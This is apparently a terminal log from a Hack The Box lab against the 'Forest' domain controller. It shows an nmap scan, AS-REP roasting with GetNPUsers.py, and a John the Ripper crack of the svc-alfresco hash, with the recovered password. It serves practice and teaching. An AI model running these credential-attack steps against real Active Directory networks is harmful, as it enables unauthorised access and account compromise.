# nmap -T4 -sS -sV -sC 10.10.10.161 Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-04 02:15 EST Nmap scan report for 10.10.10.161 Host is up (0.28s latency). Not shown: 989 closed ports PORT STATE SERVICE VERSION 53/tcp open domain? | fingerprint-strings: | DNSVersionBindReqTCP: | version |_ bind 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-03-04 07:23:52Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) 445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB) 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port53-TCP:V=7.80%I=7%D=3/4%Time=5E5F559D%P=x86_64-pc-linux-gnu%r(DNSVe SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x SF:04bind\0\0\x10\0\x03"); Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results: |_clock-skew: mean: 2h48m17s, deviation: 4h37m10s, median: 8m15s | smb-os-discovery: | OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3) | Computer name: FOREST | NetBIOS computer name: FOREST\x00 | Domain name: htb.local | Forest name: htb.local | FQDN: FOREST.htb.local |_ System time: 2020-03-03T23:26:20-08:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: required | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2020-03-04T07:26:18 |_ start_date: 2020-03-04T05:20:04
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 299.81 seconds
$ python GetNPUsers.py HTB/ -usersfile /root/userlist.txt -format john -dc-ip 10.10.10.161 ... [-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set $krb5asrep$svc-alfresco@HTB:32d83ad3aeac3898ec4fe24764a37f79$33a0e1816aa4bef47b40636df342ebd304358a005bb31deac95f8416e8ff635bdfe2a0a0c1917fe0940665cd1c0086f314b5bbe72e5a4d27d6490d08ba5681b26259877978107facdb7d55a499883bc0e814be1efdc244d34bb26d01e2c6079c104ecc4ddbb3f821fc995881cc520523bcf3a1f4e6f265058a336f93d3790a640b54ccf29ab6e4bb407c8941e245821795b2d4ff3a07d7f57e4ae440fed0878e5740f234d6f0917fab497c54c7cf0673b8909d1c9610d4696a446ae08041471a36fe94366ffa6e2d2bb9bf27b71ecd96622eafaf79ef93788cd175ce0c2458e0 [-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User ak47 doesn't have UF_DONT_REQUIRE_PREAUTH set
root@localhost:~# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt Using default input encoding: UTF-8 Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x]) Press 'q' or Ctrl-C to abort, almost any other key for status s3rvice ($krb5asrep$svc-alfresco@HTB) 1g 0:00:00:11 DONE (2020-03-04 04:17) 0.08650g/s 353435p/s 353435c/s 353435C/s s3s1k2..s3rj12 Use the "--show" option to display all of the cracked passwords reliably Session completed root@localhost:~# john --show hash.txt $krb5asrep$svc-alfresco@HTB:s3rvice